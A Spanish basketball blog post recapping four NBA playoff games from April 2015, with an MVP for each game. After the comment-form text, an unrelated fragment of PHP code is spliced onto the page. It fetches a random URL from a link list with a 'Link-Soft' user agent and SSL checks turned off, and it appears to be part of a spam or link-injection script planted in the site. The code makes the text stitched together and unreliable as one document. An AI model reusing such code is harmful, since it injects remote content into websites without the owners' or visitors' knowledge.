La Crónica: Los Warriors esperan rival

26 de April de 2015 por TheDeerHunter

Primera barrida en los playoffs 2015. Los Pelicans han plantado más cara de lo que muchos esperaban y el resultado no invalida la gran campaña que se han marcado. Al contrario los Warriors han dejado algunas dudas y necesitarán mucho más que talento racheado si de verdad aspiran a hacerse con el anillo. Nets y Bucks estrenaron su casillero de victorias, mientras que los Grizzlies ganaron su tercer partido.

Atlanta Hawks 83 – Brooklyn Nets 91

Quien la sigue la consigue y los Nets, en su séptimo intento este curso, por fin han logrado vencer a los Hawks, dejando además muy buenas sensaciones para afrontar con optimismo el resto de la eliminatoria. Los pupilos de Hollins salieron a pista con las ideas perfectamente claras para un primer parcial de 31-16. No hemos visto en muchas ocasiones este año a ningún equipo mover mejor el balón que los Hawks, como tampoco a ningún quinteto titular superar al de los 4 all-stars. Es en buena medida mérito del técnico dotar de carácter rocoso a una plantilla con fama de apática y acomodada. El exponente es Brook López reboteando como nunca, quien se impuso a Al Horford en ambos lados de la cancha en una actuación del dominicano para olvidar. El otro duelo que cayó del lado local fue el Bogdanovic vs Kyle Korver quien, por una vez, no anotó un triple. Los Hawks, no obstante, demostraron que saben encajar y remaron hasta colocarse por delante a falta de cuatro minutos para terminar el tercer cuarto. Todo un espejismo pues los Nets firmaron un 18-0 que les aseguró el primer punto.

MVP: Brook Lopez 22 puntos, 13 rebotes, 2 tapones.

Chicago Bulls 90 – Milwaukee Bucks 92

Lamentable patinazo de los Bulls, más por la forma que por el fondo. Atención al buzzer beater de Jerryd Bayless. Soprendente como teóricos aspirantes a una final de conferencia dejan escapar una oportunidad como la de anoche. Los Bucks pueden tener toda la voluntad del mundo pero evidentes limitaciones. Esta fue precisamente la cuestión, entre la voluntad de sobrevivir y la de quien, salvo un excepcional Jimmy Butler, transmitían que la cosa no iba demasiado con ellos. Naufragaron los Bulls como bloque defensivo, naufragó una segunda unidad abrumada, naufragó la dirección con un número inaceptable de pérdidas, así como unos sistemas ofensivos que parecían fiarlo todo a la inspiración de Butler. Lo normal hubiera sido una derrota humillante. Aún tuvieron suerte de “sólo” hacer el ridículo en esa última jugada. Esta noche, probablemente, LeBron y compañía cerrarán su serie, esperándoles con algún partido de descanso. Lo que les faltaba.

MVP: Jimmy Butler a pesar de la derrota. 33 puntos, 7 rebotes, 3 robos, 2 asistencias y un tapón.

Golden State Warriors 109 – New Orleans Pelicans 98

Engañoso el resultado, como el de toda la serie. Fue el choque más plácido de largo para los ganadores de la regular a pesar de lo que parece indicar el marcador. Los Splash Brothers se combinaron para aportar 64 puntos, unidos a otra excepcional actuación de Draymond Green, rozando triple doble, quien puede ser la clave para los mayores hitos. Los tres clavaron 13 triples de 24 intentos, inclemente castigo a la mermada moral rival. La escoba estaba preparada al final del tercer cuarto, aunque los Warriors decidieron no hacer más sangre. Anthony Davis pudo completar uno de los mejores debuts de la historia individualmente hablando, bien secundado por Eric Gordon. Se puede decir que han caído con las botas puestas. Llegará su momento.

MVP: Stephen Curry 39 puntos (6 de 8 en 3p) 8 rebotes, 9 asistencias y 1 robo.

Memphis Grizzlies 115 – Portland TrailBlazers 109

Se las prometían muy felices los Grizzlies tras haber dominado todos los enfrentamientos previos con cierta suficiencia. Calentaba Udrih, pero se decidía reservarlo para mejores ocasiones. El choque comenzaba siguiendo el mismo guión con Lillard y Aldridge bien controlados por la maraña defensiva visitante. No son los hombres de Joerger un equipo de excesos, limitándose a administrar energías y ventajas con inteligencia. Los Blazers pisaban el acelerador en el segundo cuarto con 30 puntos, pero encajaban, impotentes, 38. La frustración alcanzaban su punto álgido con 14 puntos de desventaja que podían parecer 200. El punto de inflexión un codazo fortuito a Conley que lo mandaba directo al hospital. Entraba Calathes casi inédito en playoffs esta campaña. Lo bonito de esta competición es que un imprevisto así puede dar la vuelta a la tortilla y supone todo un examen de carácter para todos. Los locales sentían que llegaba su momento creyendo más que nunca eso de “no perdemos contra españoles”. Como para certificarlo, arreón emocional de Batum, secundado por Lillard y un sorprendente McCollum. Sin embargo, mentalmente hay pocos equipos más duros que estos Grizzlies. Calathes cumplía, mientras que Marc negaba la mayor, con Zach, Lee y Allen de pretorianos. La remontada se llegó a acercar a 3 puntos… tan cerca y al mismo tiempo tan lejos. Los Blazers difícilmente van a disfrutar mejores ocasiones que ésta.

MVP: Marc Gasol 25 puntos, 7 rebotesm 4 asistencias, 3 tapones.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>